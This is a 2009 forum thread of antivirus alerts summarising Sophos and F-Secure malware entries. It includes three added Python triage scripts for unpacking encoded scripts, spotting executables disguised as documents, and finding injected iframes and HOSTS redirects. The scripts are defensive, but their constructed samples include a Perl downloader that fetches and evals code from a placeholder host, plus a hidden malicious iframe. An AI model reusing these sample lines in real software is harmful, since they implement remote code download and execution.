VIRUS \ SPYWARE ALERTS - July 21, 2009

by Marianna Schmudlach / July 21, 2009 12:23 AM PDT

W32/AutoRun-AMH
by Marianna Schmudlach / July 21, 2009 12:24 AM PDT

Troj/RootKit-GH
by Marianna Schmudlach / July 21, 2009 12:25 AM PDT

Troj/Poison-BA
by Marianna Schmudlach / July 21, 2009 12:26 AM PDT

Troj/MDrop-CEE
by Marianna Schmudlach / July 21, 2009 12:26 AM PDT

Troj/Iframe-CN
by Marianna Schmudlach / July 21, 2009 12:27 AM PDT

Troj/Drop-DB
by Marianna Schmudlach / July 21, 2009 12:28 AM PDT

Troj/Agent-KPQ
by Marianna Schmudlach / July 21, 2009 12:29 AM PDT

Category

* Viruses and Spyware

Type

* Trojan


Affected operating systems: Windows
Characteristics

* Installs itself in the registry


Troj/Agent-KPQ is a Trojan for the Windows platform.

When first run Troj/Agent-KPQ copies itself to <User>\Application Data\Microsoft\systemkernal.exe.

The following registry entry is created to run systemkernal.exe on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
systemkernal.exe
<User>\Application Data\Microsoft\systemkernal.exe

http://www.sophos.com/security/analyses/viruses-and-spyware/trojagentkpq.html?_log_from=rss

Mal/Fakecor-B
by Marianna Schmudlach / July 21, 2009 12:30 AM PDT

Mal/Behav-314
by Marianna Schmudlach / July 21, 2009 12:30 AM PDT

Troj/Bckdr-QWW
by Marianna Schmudlach / July 21, 2009 12:31 AM PDT

Mal/EncPk-JI
by Marianna Schmudlach / July 21, 2009 12:32 AM PDT

Troj/Bckdr-QWW
by Marianna Schmudlach / July 21, 2009 12:33 AM PDT

Mal/EncPk-JI
by Marianna Schmudlach / July 21, 2009 12:33 AM PDT

Troj/VB-EFM
by Marianna Schmudlach / July 21, 2009 12:34 AM PDT

Troj/DwnLdr-HUQ
by Marianna Schmudlach / July 21, 2009 12:35 AM PDT

Troj/DwnLdr-HUP
by Marianna Schmudlach / July 21, 2009 12:36 AM PDT

Troj/Dloadr-CQJ
by Marianna Schmudlach / July 21, 2009 12:37 AM PDT

OSX/Jahlav-C
by Marianna Schmudlach / July 21, 2009 12:38 AM PDT

Category

* Viruses and Spyware

Type

* Trojan


Affected operating systems: Macintosh

OSX/Jahlav-C is a Trojan created for the Mac OS X operating system. OSX/Jahlav-C is used to deliver malicious code to the infected computer. The initial installer is distributed as a missing Video ActiveX Object, as described on the SophosLabs blog.

OSX/Jahlav-C creates a malicious shell script file named AdobeFlash in the /Library/Internet Plug-Ins folder and sets it to run periodically. The script contains another shell script in an encoded format which in turn contains a Perl script with the main malicious payload.

The Perl script uses HTTP to communicate with a remote website and download code supplied by the attacker.

http://www.sophos.com/security/analyses/viruses-and-spyware/osxjahlavc.html?_log_from=rss
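The layered structure Sophos describes (a shell script, an encoded shell script inside it, and a Perl script inside that) is what a responder has to peel back to reach the payload and the URL it talks to. The script below is an added triage example; it is not Sophos code and not part of the original post. It assumes the encoding is base64 piped into a decoder, which the Sophos text does not state, and it runs on a constructed stand-in script with a placeholder URL rather than a real Jahlav-C sample.

```python
"""Peel nested encoded script layers of the kind described for OSX/Jahlav-C.

Added example, not Sophos code. ASSUMPTION: the "encoded format" is base64
handed to `base64 -d`/`-D` or `openssl ... -d`; the analysis does not say.
The sample script built by build_sample() is constructed here.
"""
import base64
import re

DECODER_RE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)|\bopenssl\s+(?:base64|enc)\s+-d")
# a quoted run of base64 alphabet (whitespace allowed) that a decoder consumes
BLOB_RE = re.compile(r"""['"]([A-Za-z0-9+/=\s]{16,})['"]""")
URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def decode_blob(raw):
    """Decode a candidate blob to UTF-8 text, or None if it is not base64 text."""
    try:
        return base64.b64decode(re.sub(r"\s+", "", raw), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def unwrap_layers(script, max_depth=8):
    """Return the script layers outermost first.

    While the current layer invokes a base64 decoder, try each quoted blob in
    it; the first one that decodes to text becomes the next layer.
    """
    layers = [script]
    while len(layers) <= max_depth and DECODER_RE.search(layers[-1]):
        inner = None
        for m in BLOB_RE.finditer(layers[-1]):
            inner = decode_blob(m.group(1))
            if inner:
                break
        if not inner:
            break
        layers.append(inner)
    return layers


def triage(script):
    """Layer count, whether the innermost layer carries Perl, and the URLs it names."""
    layers = unwrap_layers(script)
    innermost = layers[-1]
    return {
        "depth": len(layers),
        "has_perl": bool(re.search(r"\bperl\b", innermost)),
        "urls": sorted(set(URL_RE.findall(innermost))),
    }


def build_sample():
    """Constructed stand-in with the described shape: sh -> base64(sh) -> perl.

    update.example is a placeholder, not an indicator from the analysis.
    """
    perl = ("#!/usr/bin/perl\nuse LWP::Simple;\n"
            "my $code = get('http://update.example/u.php');\neval $code;\n")
    inner = "#!/bin/sh\ncat > /tmp/.u.pl <<'EOF'\n" + perl + "EOF\nperl /tmp/.u.pl\n"
    blob = base64.b64encode(inner.encode()).decode()
    return "#!/bin/sh\n# AdobeFlash\necho '" + blob + "' | base64 -d | sh\n"


if __name__ == "__main__":
    for depth, layer in enumerate(unwrap_layers(build_sample()), 1):
        print(f"--- layer {depth} ---\n{layer}")
    print(triage(build_sample()))
```

Run it against the AdobeFlash file itself (`triage(open(path).read())`) once the host is imaged; if the encoding turns out not to be base64, swap `decode_blob` for the right decoder and the rest of the walk is unchanged.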

Agent.avzq.
by Marianna Schmudlach / July 21, 2009 12:39 AM PDT

Real-world viruses vs computer viruses

Tuesday, July 21, 2009

We recently saw this malicious file being spread in emails. The name of the file was Novel H1N1 Flu Situation Update.exe and the icon made it look like a Word document file.

When the file was opened, it created several new files on the hard drive:

* %windir%\Temp\Novel H1N1 Flu Situation Update.doc
* %windir%\Temp\doc.exe
* %windir%\Temp\make.exe
* %windir%\system32\UsrClassEx.exe
* %windir%\system32\UsrClassEx.exe.reg


The executables contain backdoor functionality, including an elaborate keylogger.

And the document file that is dropped gets automatically opened by the malware, causing the user to think he really opened a Word file. This is what the document looks like.

More: http://www.f-secure.com/weblog/
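The trick in the F-Secure post is an executable dressed as a document: a Word icon, a document-like name, and a real .doc dropped and opened as a decoy. The following added example (not F-Secure's code and not part of the post) classifies an attachment by its magic bytes instead of its icon or name, and separately reports the double-extension and document-extension variants of the same trick. The bytes it tests are constructed here, not the real sample.

```python
"""Classify a file by content, not by icon or name.

Added example, not F-Secure's code. A PE is recognised by the MZ header plus
the PE\\0\\0 signature at e_lfanew (offset 0x3C); OLE2, OOXML (zip) and PDF
containers by their leading bytes. fake_pe() and OLE2_SAMPLE are constructed
byte strings, not real files.
"""
import struct

DOC_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf", ".txt"}
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}
# which extensions legitimately carry which container
CONTAINER_EXTS = {
    "ole2": {".doc", ".xls", ".ppt"},
    "zip": {".docx", ".xlsx", ".pptx", ".zip"},
    "pdf": {".pdf"},
}


def is_pe(data):
    """True if the DOS header's e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sniff(data):
    """Container type from magic bytes."""
    if is_pe(data):
        return "pe"
    if data.startswith(b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"):
        return "ole2"       # binary .doc/.xls/.ppt
    if data.startswith(b"PK\x03\x04"):
        return "zip"        # .docx/.xlsx/.pptx and plain zip
    if data.startswith(b"%PDF-"):
        return "pdf"
    return "unknown"


def split_name(name):
    """('report.doc', '.exe') for 'report.doc.exe'; lower-cased."""
    stem, dot, ext = name.lower().rpartition(".")
    return (stem, "." + ext) if dot else (name.lower(), "")


def assess(name, data):
    """Verdict plus the indicators that led to it."""
    stem, ext = split_name(name)
    kind = sniff(data)
    indicators = []
    if kind == "pe":
        indicators.append("content is a Windows executable")
        if ext in DOC_EXTS:
            indicators.append(f"extension {ext} claims a document")
        if any(stem.endswith(d) for d in DOC_EXTS):
            indicators.append("double extension: document type hidden before the real one")
        if ext not in EXEC_EXTS:
            indicators.append(f"non-executable extension {ext or '(none)'}")
        # a PE is a PE whatever its icon; extra indicators mean it also lies about its name
        verdict = "masquerading executable" if len(indicators) > 1 else "executable"
    elif kind in CONTAINER_EXTS:
        if ext in CONTAINER_EXTS[kind]:
            verdict = "document"
        else:
            verdict = "extension mismatch"
            indicators.append(f"{kind} content behind extension {ext or '(none)'}")
    else:
        verdict = "unknown"
    return {"name": name, "type": kind, "verdict": verdict, "indicators": indicators}


def fake_pe():
    """Minimal constructed bytes that satisfy is_pe(); not a runnable program."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)      # 0x40-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x40)        # e_lfanew -> right after it
    return bytes(hdr) + b"PE\x00\x00"


OLE2_SAMPLE = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" + b"\x00" * 8  # constructed

if __name__ == "__main__":
    print(assess("Novel H1N1 Flu Situation Update.exe", fake_pe()))
    print(assess("Novel H1N1 Flu Situation Update.doc", OLE2_SAMPLE))
```

The icon is part of the PE's resources and is the easiest thing for an attacker to choose, so a gateway rule keyed on `sniff()` returning `pe` is the check that does not depend on the name at all; the name indicators are there to explain the verdict to whoever reads the alert.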

SpySniper
by Marianna Schmudlach / July 21, 2009 12:40 AM PDT
Worm:VBS/HeadTail.A
by Marianna Schmudlach / July 21, 2009 12:41 AM PDT

Name : Worm:VBS/HeadTail.A
Category: Malware
Type: Worm
Platform: VBS

Summary
F-Secure Antivirus products had a brief false alarm with this detection. A clean file called avh_fsav_800_bin was detected as being infected on 21st of July 2009. This has now been fixed. If the avh_fsav_800_bin file was removed, it will be recreated automatically and there is no need for further action by the user. We apologize for any inconvenience.


Additional Details
Worm:VBS/HeadTail.A is a Visual Basic Script worm that propagates by copying itself to available removable, fixed, and remote drives.

It is also able to delete predefined files and processes.

More: http://www.f-secure.com/v-descs/worm_vbs_headtail_a.shtml

Adware-BHO.gen.d!150accdd926b
by Marianna Schmudlach / July 21, 2009 12:55 AM PDT

Type
Program
SubType
Adware
Discovery Date
07/21/2009

This software is not a virus or a Trojan. It is detected as a "potentially unwanted program" (PUP). PUPs are any piece of software that a reasonably security- or privacy-minded computer user may want to be informed of and, in some cases, remove. PUPs are often made by a legitimate corporate entity for some beneficial purpose, but they alter the security state of the computer on which they are installed, or the privacy posture of the user of the system, such that most users will want to be aware of them.

Avert

W32/Scribble-B
by Marianna Schmudlach / July 21, 2009 2:36 AM PDT

Aliases

* Virus.Win32.Virut.ce
* PE_VIRUX.A
* Virus:Win32/Virut.BM
* Win32:Vitro

Category

* Viruses and Spyware

Type

* Virus


How it spreads

* Infected files

Affected operating systems: Windows

W32/Scribble-B is a family of polymorphic viruses for the Windows platform.

Members of W32/Scribble-B allow a remote attacker to gain access and control over the infected computer through IRC channels.

Members of W32/Scribble-B infect files with the EXE and SCR extensions when they are opened or run.

Members of W32/Scribble-B inject a malicious iframe into files whose extensions start with HTM, PHP or ASP, with affected files detected as Troj/Fujif-Gen. At the time of writing the iframe points to a site that hosts more malware.

Members of W32/Scribble-B also add a line to the Windows HOSTS file to redirect the infected computer to an infected website.

http://www.sophos.com/security/analyses/viruses-and-spyware/w32scribbleb.html?_log_from=rss
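Two of the artefacts in the Sophos write-up can be checked from the host side without a signature: an iframe injected into files whose extensions start with HTM, PHP or ASP, and a line added to the HOSTS file. The scanner below is an added example, not Sophos code and not part of the post. It flags iframes that are hidden (one-pixel or CSS-hidden) or point off-site, and HOSTS entries that resolve a name to a real address rather than loopback or 0.0.0.0. The file contents, hostnames and the 192.0.2.10 address are constructed placeholders, not indicators from the analysis.

```python
"""Find injected iframes in web files and added HOSTS redirections.

Added example, not Sophos code. SAMPLE_FILES and SAMPLE_HOSTS are constructed;
bad.example, update.example and 192.0.2.10 are placeholders.
"""
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# "extensions start with HTM, PHP or ASP": .htm .html .php .php5 .asp .aspx ...
TARGET_EXT_RE = re.compile(r"\.(htm|php|asp)[^.\\/]*$", re.I)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I | re.S)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def is_target_file(name):
    return bool(TARGET_EXT_RE.search(name))


def parse_attrs(attr_text):
    """Attribute dict for one tag; handles double-, single- and un-quoted values."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def iframe_findings(html, site_host):
    """iframes that are hidden or load from a host other than site_host."""
    out = []
    for m in IFRAME_RE.finditer(html):
        a = parse_attrs(m.group(1))
        reasons = []
        dims = [a.get("width", ""), a.get("height", "")]
        if any(d.lower().rstrip("px").strip() in ("0", "1") for d in dims):
            reasons.append("hidden: zero/one pixel size")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden: css")
        src = a.get("src", "")
        host = urlsplit(src).hostname or ""
        if host and host.lower() != site_host.lower():
            reasons.append(f"off-site: {host}")
        if reasons:
            out.append({"src": src, "reasons": reasons, "offset": m.start()})
    return out


def hosts_redirects(hosts_text):
    """(ip, name) pairs that send a name to a real address.

    Loopback and 0.0.0.0 entries are the normal shape of localhost lines and
    ad-blocking sinkholes, so only other addresses are reported.
    """
    hits = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ip_address(parts[0])
        except ValueError:
            continue
        if ip.is_loopback or ip.is_unspecified:
            continue
        for name in parts[1:]:
            hits.append((str(ip), name))
    return hits


def scan(files, site_host, hosts_text):
    """files: {name: content}. Only HTM/PHP/ASP-prefixed names are inspected."""
    report = {}
    for name, html in files.items():
        if is_target_file(name):
            findings = iframe_findings(html, site_host)
            if findings:
                report[name] = findings
    return {"iframes": report, "hosts": hosts_redirects(hosts_text)}


# constructed sample web root and HOSTS file
SAMPLE_FILES = {
    "index.html": '<html><body><p>Welcome</p>'
                  '<iframe width="560" height="315" src="https://www.youtube.com/embed/x"></iframe>'
                  '</body></html>\n'
                  '<iframe src="http://bad.example/in.cgi?3" width=1 height=1 style="visibility: hidden"></iframe>',
    "about.php": "<?php echo 'hi'; ?><p>no frames here</p>",
    "readme.txt": '<iframe src="http://bad.example/x" width=0 height=0></iframe>',
}
SAMPLE_HOSTS = """# constructed sample
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example
192.0.2.10      update.example
"""

if __name__ == "__main__":
    print(scan(SAMPLE_FILES, "www.example.org", SAMPLE_HOSTS))
```

On a real web root, build `files` by walking the directory and reading each path, and pass the site's own hostname so legitimate embeds are reported only as off-site rather than hidden; a visible third-party embed is review noise, a one-pixel frame appended after `</html>` is the Scribble-B pattern.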

W32/Autorun-AMJ
by Marianna Schmudlach / July 21, 2009 3:02 AM PDT

Category

* Viruses and Spyware

Type

* Worm


Affected operating systems: Windows
Characteristics

* Installs itself in the registry


W32/Autorun-AMJ is a worm for the Windows platform.

When W32/Autorun-AMJ is installed the following files are created:

<Temp>\suicide.bat
<System>\csrcs.exe

The following registry entry is created to run csrcs.exe on startup:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
csrcs
<System>\csrcs.exe

The following registry entry is changed to run csrcs.exe on startup:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell
Explorer.exe csrcs.exe

Registry entries are set as follows:

More: http://www.sophos.com/security/analyses/viruses-and-spyware/w32autorunamj.html?_log_from=rss

Troj/Zbot-GS
by Marianna Schmudlach / July 21, 2009 3:02 AM PDT

Troj/Mdrop-CED
by Marianna Schmudlach / July 21, 2009 3:03 AM PDT

Troj/Inject-IK
by Marianna Schmudlach / July 21, 2009 3:04 AM PDT

Troj/Dloadr-CQK
by Marianna Schmudlach / July 21, 2009 3:05 AM PDT

Troj/BHO-MZ
by Marianna Schmudlach / July 21, 2009 3:05 AM PDT

Troj/Agent-KPS
by Marianna Schmudlach / July 21, 2009 3:06 AM PDT